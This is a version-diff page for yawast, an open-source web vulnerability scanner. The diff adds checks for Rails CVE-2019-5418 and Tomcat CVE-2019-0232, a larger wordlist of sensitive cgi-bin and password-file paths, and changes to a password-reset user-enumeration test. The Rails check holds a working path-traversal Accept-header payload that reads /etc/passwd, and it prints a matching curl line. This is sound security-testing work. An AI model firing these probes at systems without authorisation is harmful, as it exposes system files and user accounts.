yawast 0.7.0.beta2 → 0.7.0.beta3
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.rubocop.yml +6 -0
- data/CHANGELOG.md +3 -0
- data/README.md +5 -1
- data/lib/resources/common_file.txt +208 -0
- data/lib/scanner/core.rb +3 -2
- data/lib/scanner/plugins/applications/cms/generic.rb +11 -1
- data/lib/scanner/plugins/applications/framework/rails.rb +39 -0
- data/lib/scanner/plugins/applications/generic/password_reset.rb +40 -14
- data/lib/scanner/plugins/dns/caa.rb +1 -1
- data/lib/scanner/plugins/http/generic.rb +18 -8
- data/lib/scanner/plugins/servers/apache.rb +113 -15
- data/lib/scanner/plugins/servers/generic.rb +8 -0
- data/lib/scanner/plugins/servers/iis.rb +26 -3
- data/lib/scanner/plugins/servers/nginx.rb +33 -0
- data/lib/scanner/plugins/servers/python.rb +8 -0
- data/lib/scanner/plugins/spider/spider.rb +7 -3
- data/lib/scanner/vuln_scan.rb +18 -5
- data/lib/shared/http.rb +1 -5
- data/lib/shared/output.rb +10 -7
- data/lib/version.rb +1 -1
- data/test/data/dir.txt +9 -0
- data/test/data/etc_passwd.txt +16 -0
- data/test/data/nginx_status_page.txt +4 -0
- data/test/test_app_fw_rails.rb +28 -0
- data/test/test_scan_apache.rb +23 -0
- data/test/test_scan_nginx.rb +33 -0
- data/yawast.gemspec +0 -1
- metadata +13 -18
- data/test/test_scan_nginx_banner.rb +0 -17
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA1:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 7b0bb4cac61cb155a8c1bd6ac9393bfd7191e617
|
|
4
|
+
data.tar.gz: 11d3f67fb4d47496a67021a9802138713d167892
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 36da9932032084faf8641741829ad7df7a2bdfa8be6f7c73ad05e6f3a0cedce7092b59be3dbd935b25ffe4ac3d7b22aaffffb55ba3fd6eba4b0219e12a75241d
|
|
7
|
+
data.tar.gz: a0f36333064f4299d03ba7139fe6fe8821929107730c9b5cdbfe584977be05ee211ffeb3dd1fe1bd33261285015725cc77f77abd99b2c8898fc7e841468140b3
|
data/.rubocop.yml
CHANGED
data/CHANGELOG.md
CHANGED
|
@@ -13,6 +13,9 @@
|
|
|
13
13
|
* [#148](https://github.com/adamcaudill/yawast/issues/148) - Added `--vuln_scan` option to enable new vulnerability scanner
|
|
14
14
|
* [#151](https://github.com/adamcaudill/yawast/issues/151) - User Enumeration via Password Reset Form Timing Differences
|
|
15
15
|
* [#152](https://github.com/adamcaudill/yawast/issues/152) - Add check for 64bit TLS Cert Serial Numbers
|
|
16
|
+
* [#156](https://github.com/adamcaudill/yawast/issues/156) - Check for Rails CVE-2019-5418
|
|
17
|
+
* [#157](https://github.com/adamcaudill/yawast/issues/157) - Add check for Nginx Status Page
|
|
18
|
+
* [#158](https://github.com/adamcaudill/yawast/issues/158) - Add check for Tomcat RCE CVE-2019-0232
|
|
16
19
|
* [#130](https://github.com/adamcaudill/yawast/issues/130) - Bug: HSTS Error leads to printing HTML
|
|
17
20
|
* [#132](https://github.com/adamcaudill/yawast/issues/132) - Bug: Typo in SSL Output
|
|
18
21
|
* [#142](https://github.com/adamcaudill/yawast/issues/142) - Bug: Error In Collecting DNS Information
|
data/README.md
CHANGED
|
@@ -53,7 +53,7 @@ The following tests are performed:
|
|
|
53
53
|
* *(Generic)* Presence of readme.html
|
|
54
54
|
* *(Generic)* Presence of CHANGELOG.txt
|
|
55
55
|
* *(Generic)* Missing cookie flags (Secure, HttpOnly, and SameSite)
|
|
56
|
-
* *(Generic)* Search for 14,
|
|
56
|
+
* *(Generic)* Search for 14,405 common files (via `--files`) & 21,332 common directories (via `--dir`)
|
|
57
57
|
* *(Apache)* Info Disclosure: Module listing enabled
|
|
58
58
|
* *(Apache)* Info Disclosure: Server version
|
|
59
59
|
* *(Apache)* Info Disclosure: OpenSSL module version
|
|
@@ -65,7 +65,10 @@ The following tests are performed:
|
|
|
65
65
|
* *(Apache Tomcat)* Tomcat Host Manager Weak Password
|
|
66
66
|
* *(Apache Tomcat)* Tomcat version detection via invalid HTTP verb
|
|
67
67
|
* *(Apache Tomcat)* Tomcat PUT RCE (CVE-2017-12617)
|
|
68
|
+
* *(Apache Tomcat)* Tomcat Windows RCE (CVE-2019-0232)
|
|
68
69
|
* *(Apache Struts)* Sample files which may be vulnerable
|
|
70
|
+
* *(Nginx)* Info Disclosure: Server version
|
|
71
|
+
* *(Nginx)* Info Disclosure: Server status
|
|
69
72
|
* *(IIS)* Info Disclosure: Server version
|
|
70
73
|
* *(ASP.NET)* Info Disclosure: ASP.NET version
|
|
71
74
|
* *(ASP.NET)* Info Disclosure: ASP.NET MVC version
|
|
@@ -74,6 +77,7 @@ The following tests are performed:
|
|
|
74
77
|
* *(ASP.NET)* Debugging Enabled
|
|
75
78
|
* *(nginx)* Info Disclosure: Server version
|
|
76
79
|
* *(PHP)* Info Disclosure: PHP version
|
|
80
|
+
* *(Rails)* File Content Disclosure: CVE-2019-5418
|
|
77
81
|
|
|
78
82
|
CMS Detection:
|
|
79
83
|
|
|
@@ -3851,6 +3851,7 @@ bottom.php
|
|
|
3851
3851
|
bounce.php
|
|
3852
3852
|
boutique.html
|
|
3853
3853
|
boutique.php
|
|
3854
|
+
bower.json
|
|
3854
3855
|
box.gif
|
|
3855
3856
|
box.php
|
|
3856
3857
|
br.asp
|
|
@@ -4183,7 +4184,213 @@ cfg.php
|
|
|
4183
4184
|
cfgECText.cfm
|
|
4184
4185
|
cgi-bin.bak
|
|
4185
4186
|
cgi-bin.old
|
|
4187
|
+
cgi-bin/.access
|
|
4188
|
+
cgi-bin/.htaccess
|
|
4189
|
+
cgi-bin/.htaccess.old
|
|
4190
|
+
cgi-bin/.htaccess.save
|
|
4191
|
+
cgi-bin/.htaccess~
|
|
4192
|
+
cgi-bin/.htpasswd
|
|
4193
|
+
cgi-bin/.passwd
|
|
4194
|
+
cgi-bin/.www_acl
|
|
4195
|
+
cgi-bin/.wwwacl
|
|
4196
|
+
cgi-bin//_vti_bin/fpcount.exe
|
|
4197
|
+
cgi-bin/CGImail.exe
|
|
4198
|
+
cgi-bin/Cgitest.exe
|
|
4199
|
+
cgi-bin/FormMail.cgi
|
|
4200
|
+
cgi-bin/MachineInfo
|
|
4201
|
+
cgi-bin/Pbcgi.exe
|
|
4202
|
+
cgi-bin/Upload.pl
|
|
4203
|
+
cgi-bin/WINDMAIL.EXE
|
|
4204
|
+
cgi-bin/add_ftp.cgi
|
|
4205
|
+
cgi-bin/addbanner.cgi
|
|
4206
|
+
cgi-bin/adduser.cgi
|
|
4207
|
+
cgi-bin/admin.php
|
|
4208
|
+
cgi-bin/admin.pl
|
|
4209
|
+
cgi-bin/adminwww.cgi
|
|
4210
|
+
cgi-bin/af.cgi
|
|
4211
|
+
cgi-bin/aglimpse
|
|
4212
|
+
cgi-bin/aglimpse.cgi
|
|
4213
|
+
cgi-bin/alienform.cgi
|
|
4214
|
+
cgi-bin/amadmin.pl
|
|
4215
|
+
cgi-bin/ans.pl
|
|
4216
|
+
cgi-bin/architext_query.cgi
|
|
4186
4217
|
cgi-bin/awstats.pl
|
|
4218
|
+
cgi-bin/badmin.cgi
|
|
4219
|
+
cgi-bin/banner.cgi
|
|
4220
|
+
cgi-bin/bannereditor.cgi
|
|
4221
|
+
cgi-bin/bash
|
|
4222
|
+
cgi-bin/bigconf.cgi
|
|
4223
|
+
cgi-bin/book.cgi
|
|
4224
|
+
cgi-bin/build.cgi
|
|
4225
|
+
cgi-bin/cached_feed.cgi
|
|
4226
|
+
cgi-bin/cachemgr.cgi
|
|
4227
|
+
cgi-bin/calendar.php
|
|
4228
|
+
cgi-bin/calendar.pl
|
|
4229
|
+
cgi-bin/cart.pl
|
|
4230
|
+
cgi-bin/cart32.exe
|
|
4231
|
+
cgi-bin/cartmanager.cgi
|
|
4232
|
+
cgi-bin/ccbill-local.cgi
|
|
4233
|
+
cgi-bin/ccbill-local.pl
|
|
4234
|
+
cgi-bin/cfgwiz.exe
|
|
4235
|
+
cgi-bin/cgi-lib.pl
|
|
4236
|
+
cgi-bin/cgi-test.exe
|
|
4237
|
+
cgi-bin/cgimail.exe
|
|
4238
|
+
cgi-bin/cgitest.exe
|
|
4239
|
+
cgi-bin/change-your-password.pl
|
|
4240
|
+
cgi-bin/clickcount.pl
|
|
4241
|
+
cgi-bin/clickresponder.pl
|
|
4242
|
+
cgi-bin/cmd.exe
|
|
4243
|
+
cgi-bin/cmd1.exe
|
|
4244
|
+
cgi-bin/code.php
|
|
4245
|
+
cgi-bin/code.php3
|
|
4246
|
+
cgi-bin/com5.java
|
|
4247
|
+
cgi-bin/com5.pl
|
|
4248
|
+
cgi-bin/commandit.cgi
|
|
4249
|
+
cgi-bin/commerce.cgi
|
|
4250
|
+
cgi-bin/common.php
|
|
4251
|
+
cgi-bin/compatible.cgi
|
|
4252
|
+
cgi-bin/contents.htm
|
|
4253
|
+
cgi-bin/count.cgi
|
|
4254
|
+
cgi-bin/csh
|
|
4255
|
+
cgi-bin/cstat.pl
|
|
4256
|
+
cgi-bin/db_manager.cgi
|
|
4257
|
+
cgi-bin/dbmlparser.exe
|
|
4258
|
+
cgi-bin/diagnose.cgi
|
|
4259
|
+
cgi-bin/dig.cgi
|
|
4260
|
+
cgi-bin/download.cgi
|
|
4261
|
+
cgi-bin/dumpenv.pl
|
|
4262
|
+
cgi-bin/edit.pl
|
|
4263
|
+
cgi-bin/enter.cgi
|
|
4264
|
+
cgi-bin/environ.cgi
|
|
4265
|
+
cgi-bin/environ.pl
|
|
4266
|
+
cgi-bin/finger.pl
|
|
4267
|
+
cgi-bin/flexform.cgi
|
|
4268
|
+
cgi-bin/formmail.cgi
|
|
4269
|
+
cgi-bin/formmail.pl
|
|
4270
|
+
cgi-bin/foxweb.dll
|
|
4271
|
+
cgi-bin/foxweb.exe
|
|
4272
|
+
cgi-bin/fpadmin.htm
|
|
4273
|
+
cgi-bin/fpremadm.exe
|
|
4274
|
+
cgi-bin/fpsrvadm.exe
|
|
4275
|
+
cgi-bin/ftp.pl
|
|
4276
|
+
cgi-bin/ftpsh
|
|
4277
|
+
cgi-bin/generate.cgi
|
|
4278
|
+
cgi-bin/get32.exe
|
|
4279
|
+
cgi-bin/getdoc.cgi
|
|
4280
|
+
cgi-bin/gm.cgi
|
|
4281
|
+
cgi-bin/guestbook.cgi
|
|
4282
|
+
cgi-bin/guestbook.pl
|
|
4283
|
+
cgi-bin/handler.cgi
|
|
4284
|
+
cgi-bin/hello.bat
|
|
4285
|
+
cgi-bin/hitview.cgi
|
|
4286
|
+
cgi-bin/hpnst.exe
|
|
4287
|
+
cgi-bin/htimage.exe
|
|
4288
|
+
cgi-bin/html2chtml.cgi
|
|
4289
|
+
cgi-bin/html2wml.cgi
|
|
4290
|
+
cgi-bin/htsearch.cgi
|
|
4291
|
+
cgi-bin/imagemap
|
|
4292
|
+
cgi-bin/imagemap.exe
|
|
4293
|
+
cgi-bin/index.pl
|
|
4294
|
+
cgi-bin/infosrch.cgi
|
|
4295
|
+
cgi-bin/input.bat
|
|
4296
|
+
cgi-bin/journal.cgi
|
|
4297
|
+
cgi-bin/ksh
|
|
4298
|
+
cgi-bin/listrec.pl
|
|
4299
|
+
cgi-bin/loadpage.cgi
|
|
4300
|
+
cgi-bin/log-reader.cgi
|
|
4301
|
+
cgi-bin/logi.php
|
|
4302
|
+
cgi-bin/login
|
|
4303
|
+
cgi-bin/logit.cgi
|
|
4304
|
+
cgi-bin/logs.pl
|
|
4305
|
+
cgi-bin/mailform.exe
|
|
4306
|
+
cgi-bin/mailit.pl
|
|
4307
|
+
cgi-bin/main.cgi
|
|
4308
|
+
cgi-bin/main_menu.pl
|
|
4309
|
+
cgi-bin/majordomo.pl
|
|
4310
|
+
cgi-bin/man.sh
|
|
4311
|
+
cgi-bin/meta.pl
|
|
4312
|
+
cgi-bin/minimal.exe
|
|
4313
|
+
cgi-bin/mkilog.exe
|
|
4314
|
+
cgi-bin/mkplog.exe
|
|
4315
|
+
cgi-bin/moin.cgi
|
|
4316
|
+
cgi-bin/mrtg.cgi
|
|
4317
|
+
cgi-bin/noshell
|
|
4318
|
+
cgi-bin/nph-error.pl
|
|
4319
|
+
cgi-bin/nph-maillist.pl
|
|
4320
|
+
cgi-bin/pass
|
|
4321
|
+
cgi-bin/passwd
|
|
4322
|
+
cgi-bin/passwd.txt
|
|
4323
|
+
cgi-bin/password
|
|
4324
|
+
cgi-bin/perl
|
|
4325
|
+
cgi-bin/perl.exe
|
|
4326
|
+
cgi-bin/php.ini
|
|
4327
|
+
cgi-bin/post16.exe
|
|
4328
|
+
cgi-bin/post32.exe
|
|
4329
|
+
cgi-bin/post_query
|
|
4330
|
+
cgi-bin/postcards.cgi
|
|
4331
|
+
cgi-bin/ppdscgi.exe
|
|
4332
|
+
cgi-bin/printenv
|
|
4333
|
+
cgi-bin/printenv.pl
|
|
4334
|
+
cgi-bin/processit.pl
|
|
4335
|
+
cgi-bin/profile.cgi
|
|
4336
|
+
cgi-bin/quikstore.cfg
|
|
4337
|
+
cgi-bin/redir.exe
|
|
4338
|
+
cgi-bin/register.cgi
|
|
4339
|
+
cgi-bin/responder.cgi
|
|
4340
|
+
cgi-bin/retrieve_password.pl
|
|
4341
|
+
cgi-bin/rguest.exe
|
|
4342
|
+
cgi-bin/rksh
|
|
4343
|
+
cgi-bin/rmp_query
|
|
4344
|
+
cgi-bin/robpoll.cgi
|
|
4345
|
+
cgi-bin/rsh
|
|
4346
|
+
cgi-bin/search
|
|
4347
|
+
cgi-bin/search.php
|
|
4348
|
+
cgi-bin/sendform.cgi
|
|
4349
|
+
cgi-bin/sendpage.pl
|
|
4350
|
+
cgi-bin/sendtemp.pl
|
|
4351
|
+
cgi-bin/sh
|
|
4352
|
+
cgi-bin/shop.cgi
|
|
4353
|
+
cgi-bin/show.pl
|
|
4354
|
+
cgi-bin/showuser.cgi
|
|
4355
|
+
cgi-bin/shtml.dll
|
|
4356
|
+
cgi-bin/simplestguest.cgi
|
|
4357
|
+
cgi-bin/simplestmail.cgi
|
|
4358
|
+
cgi-bin/stat.pl
|
|
4359
|
+
cgi-bin/stats.pl
|
|
4360
|
+
cgi-bin/stats.prf
|
|
4361
|
+
cgi-bin/statsconfig
|
|
4362
|
+
cgi-bin/statusconfig.pl
|
|
4363
|
+
cgi-bin/statview.pl
|
|
4364
|
+
cgi-bin/store.cgi
|
|
4365
|
+
cgi-bin/survey
|
|
4366
|
+
cgi-bin/survey.cgi
|
|
4367
|
+
cgi-bin/tablebuild.pl
|
|
4368
|
+
cgi-bin/tcsh
|
|
4369
|
+
cgi-bin/test-cgi.bat
|
|
4370
|
+
cgi-bin/test-cgi.exe
|
|
4371
|
+
cgi-bin/test-cgi.tcl
|
|
4372
|
+
cgi-bin/test.bat
|
|
4373
|
+
cgi-bin/test2.pl
|
|
4374
|
+
cgi-bin/textcounter.pl
|
|
4375
|
+
cgi-bin/title.cgi
|
|
4376
|
+
cgi-bin/traffic.cgi
|
|
4377
|
+
cgi-bin/tst.bat
|
|
4378
|
+
cgi-bin/upload.cgi
|
|
4379
|
+
cgi-bin/viewlogs.pl
|
|
4380
|
+
cgi-bin/visadmin.exe
|
|
4381
|
+
cgi-bin/visitor.exe
|
|
4382
|
+
cgi-bin/vote.cgi
|
|
4383
|
+
cgi-bin/wais.pl
|
|
4384
|
+
cgi-bin/wconsole.dll
|
|
4385
|
+
cgi-bin/webfind.exe
|
|
4386
|
+
cgi-bin/webif.cgi
|
|
4387
|
+
cgi-bin/webmap.cgi
|
|
4388
|
+
cgi-bin/webplus.exe
|
|
4389
|
+
cgi-bin/windmail
|
|
4390
|
+
cgi-bin/windmail.exe
|
|
4391
|
+
cgi-bin/wrap.cgi
|
|
4392
|
+
cgi-bin/wwwadmin.pl
|
|
4393
|
+
cgi-bin/zsh
|
|
4187
4394
|
cgi.bin
|
|
4188
4395
|
cgi.pl/
|
|
4189
4396
|
cgu.htm
|
|
@@ -6855,6 +7062,7 @@ groupmgr.php
|
|
|
6855
7062
|
groupmsg.php
|
|
6856
7063
|
groups.html
|
|
6857
7064
|
groups.php
|
|
7065
|
+
gruntfile.js
|
|
6858
7066
|
gs.php
|
|
6859
7067
|
gsearch.html
|
|
6860
7068
|
gsearch.php
|
data/lib/scanner/core.rb
CHANGED
|
@@ -69,6 +69,7 @@ module Yawast
|
|
|
69
69
|
|
|
70
70
|
# server specific checks
|
|
71
71
|
Yawast::Scanner::Plugins::Servers::Apache.check_all(@uri)
|
|
72
|
+
Yawast::Scanner::Plugins::Servers::Nginx.check_all(@uri)
|
|
72
73
|
Yawast::Scanner::Plugins::Servers::Iis.check_all(@uri, head)
|
|
73
74
|
|
|
74
75
|
Yawast::Scanner::Plugins::Http::FilePresence.check_all @uri, options.files
|
|
@@ -77,9 +78,9 @@ module Yawast
|
|
|
77
78
|
Yawast::Scanner::Plugins::Http::Generic.check_propfind(@uri)
|
|
78
79
|
Yawast::Scanner::Plugins::Http::Generic.check_options(@uri)
|
|
79
80
|
Yawast::Scanner::Plugins::Http::Generic.check_trace(@uri)
|
|
80
|
-
end
|
|
81
81
|
|
|
82
|
-
|
|
82
|
+
Yawast::Scanner::Plugins::Spider::Spider.spider(@uri) if options.spider
|
|
83
|
+
end
|
|
83
84
|
|
|
84
85
|
# check for common directories
|
|
85
86
|
if options.dir
|
|
@@ -10,7 +10,17 @@ module Yawast
|
|
|
10
10
|
regex = /<meta name="generator[^>]+content\s*=\s*['"]([^'"]+)['"][^>]*>/
|
|
11
11
|
match = body.match regex
|
|
12
12
|
|
|
13
|
-
|
|
13
|
+
if match
|
|
14
|
+
Yawast::Utilities.puts_info "Meta Generator: #{match[1]}"
|
|
15
|
+
|
|
16
|
+
Yawast::Shared::Output.log_hash 'vulnerabilities',
|
|
17
|
+
'cms_meta_generator_exposed',
|
|
18
|
+
{vulnerable: true, generator: match[1]}
|
|
19
|
+
else
|
|
20
|
+
Yawast::Shared::Output.log_hash 'vulnerabilities',
|
|
21
|
+
'cms_meta_generator_exposed',
|
|
22
|
+
{vulnerable: false, generator: nil}
|
|
23
|
+
end
|
|
14
24
|
end
|
|
15
25
|
end
|
|
16
26
|
end
|
|
@@ -0,0 +1,39 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
module Yawast
|
|
4
|
+
module Scanner
|
|
5
|
+
module Plugins
|
|
6
|
+
module Applications
|
|
7
|
+
module Framework
|
|
8
|
+
class Rails
|
|
9
|
+
def self.check_all(uri, links)
|
|
10
|
+
check_cve_2019_5418 links
|
|
11
|
+
end
|
|
12
|
+
|
|
13
|
+
def self.check_cve_2019_5418(links)
|
|
14
|
+
Yawast::Shared::Output.log_hash 'vulnerabilities',
|
|
15
|
+
'rails_cve_2019_5418',
|
|
16
|
+
{vulnerable: false, body: nil}
|
|
17
|
+
|
|
18
|
+
links.each do |link|
|
|
19
|
+
# this only applies to controllers, so skip the check unless the link ends with '/'
|
|
20
|
+
next unless link.to_s.end_with? '/'
|
|
21
|
+
|
|
22
|
+
body = Yawast::Shared::Http.get(URI.parse(link), {'Accept' => '../../../../../../../../../etc/passwd{{'})
|
|
23
|
+
if body.include? 'root:'
|
|
24
|
+
Yawast::Utilities.puts_vuln 'Rails CVE-2019-5418: File Content Disclosure'
|
|
25
|
+
Yawast::Utilities.puts_raw "\tcurl -H 'Accept: ../../../../../../../../../etc/passwd{{' #{link}"
|
|
26
|
+
|
|
27
|
+
Yawast::Shared::Output.log_hash 'vulnerabilities',
|
|
28
|
+
'rails_cve_2019_5418',
|
|
29
|
+
{vulnerable: true, body: body, uri: link}
|
|
30
|
+
break
|
|
31
|
+
end
|
|
32
|
+
end
|
|
33
|
+
end
|
|
34
|
+
end
|
|
35
|
+
end
|
|
36
|
+
end
|
|
37
|
+
end
|
|
38
|
+
end
|
|
39
|
+
end
|
|
@@ -10,11 +10,7 @@ module Yawast
|
|
|
10
10
|
module Generic
|
|
11
11
|
class PasswordReset
|
|
12
12
|
def self.setup
|
|
13
|
-
@reset_page =
|
|
14
|
-
Yawast::Utilities.prompt 'What is the application password reset page?'
|
|
15
|
-
else
|
|
16
|
-
Yawast.options.pass_reset_page
|
|
17
|
-
end
|
|
13
|
+
@reset_page = Yawast.options.pass_reset_page
|
|
18
14
|
|
|
19
15
|
@valid_user = if Yawast.options.user.nil?
|
|
20
16
|
Yawast::Utilities.prompt 'What is a valid user?'
|
|
@@ -23,6 +19,7 @@ module Yawast
|
|
|
23
19
|
end
|
|
24
20
|
|
|
25
21
|
@timing = {true => [], false => []}
|
|
22
|
+
@element_name = nil
|
|
26
23
|
end
|
|
27
24
|
|
|
28
25
|
def self.check_resp_user_enum
|
|
@@ -94,12 +91,12 @@ module Yawast
|
|
|
94
91
|
invalid_4: @timing[false][3], invalid_5: @timing[false][4]}
|
|
95
92
|
end
|
|
96
93
|
rescue ArgumentError => e
|
|
97
|
-
Yawast::Utilities.
|
|
94
|
+
Yawast::Utilities.puts_error "Unable to find a matching element to perform the User Enumeration via Password Reset Response test (#{e.message})"
|
|
98
95
|
end
|
|
99
96
|
end
|
|
100
97
|
|
|
101
98
|
def self.fill_form_get_body(uri, user, valid, log_output)
|
|
102
|
-
options = Selenium::WebDriver::Chrome::Options.new({args: ['headless']})
|
|
99
|
+
options = Selenium::WebDriver::Chrome::Options.new({args: ['headless', 'incognito']})
|
|
103
100
|
|
|
104
101
|
# if we have a proxy set, use that
|
|
105
102
|
if !Yawast.options.proxy.nil?
|
|
@@ -115,6 +112,18 @@ module Yawast
|
|
|
115
112
|
# find the page form element - this is going to be a best effort thing, and may not always be right
|
|
116
113
|
element = find_user_field driver
|
|
117
114
|
|
|
115
|
+
# the element may not actually be visible yet (heavy JS pages)
|
|
116
|
+
# so, we'll go into a loop for a few seconds to see if it'll show up
|
|
117
|
+
counter = 0
|
|
118
|
+
unless element.displayed?
|
|
119
|
+
until element.displayed?
|
|
120
|
+
sleep 0.5
|
|
121
|
+
counter += 1
|
|
122
|
+
|
|
123
|
+
break if counter > 20
|
|
124
|
+
end
|
|
125
|
+
end
|
|
126
|
+
|
|
118
127
|
element.send_keys user
|
|
119
128
|
|
|
120
129
|
beginning_time = Time.now
|
|
@@ -155,22 +164,39 @@ module Yawast
|
|
|
155
164
|
element = find_element driver, 'forgetPasswordEmailOrUsername'
|
|
156
165
|
return element unless element.nil?
|
|
157
166
|
|
|
167
|
+
element = find_element driver, 'username'
|
|
168
|
+
return element unless element.nil?
|
|
169
|
+
|
|
158
170
|
# if we got here, it means that we don't have an element we know about, so we have to prompt
|
|
159
|
-
|
|
160
|
-
|
|
161
|
-
|
|
162
|
-
|
|
171
|
+
if @element_name.nil?
|
|
172
|
+
Yawast::Utilities.puts_raw 'Unable to find a known element to enter the user name. Please identify the proper element.'
|
|
173
|
+
Yawast::Utilities.puts_raw 'If this element name seems to be common, please request that it be added: https://github.com/adamcaudill/yawast/issues'
|
|
174
|
+
@element_name = Yawast::Utilities.prompt 'What is the user/email entry element name?'
|
|
175
|
+
end
|
|
176
|
+
element = find_element driver, @element_name
|
|
163
177
|
return element unless element.nil?
|
|
164
178
|
|
|
165
179
|
raise ArgumentError, 'No matching element found.'
|
|
166
180
|
end
|
|
167
181
|
|
|
168
182
|
def self.find_element(driver, name)
|
|
183
|
+
ret = nil
|
|
184
|
+
|
|
185
|
+
# first, check by name
|
|
169
186
|
begin
|
|
170
|
-
|
|
171
|
-
rescue
|
|
172
|
-
|
|
187
|
+
ret = driver.find_element({name: name})
|
|
188
|
+
rescue # rubocop:disable Style/RescueStandardError, Lint/HandleExceptions
|
|
189
|
+
# do nothing
|
|
173
190
|
end
|
|
191
|
+
|
|
192
|
+
# next, maybe it's id instead of name
|
|
193
|
+
begin
|
|
194
|
+
ret = driver.find_element({id: name})
|
|
195
|
+
rescue # rubocop:disable Style/RescueStandardError, Lint/HandleExceptions
|
|
196
|
+
# do nothing
|
|
197
|
+
end
|
|
198
|
+
|
|
199
|
+
ret
|
|
174
200
|
end
|
|
175
201
|
end
|
|
176
202
|
end
|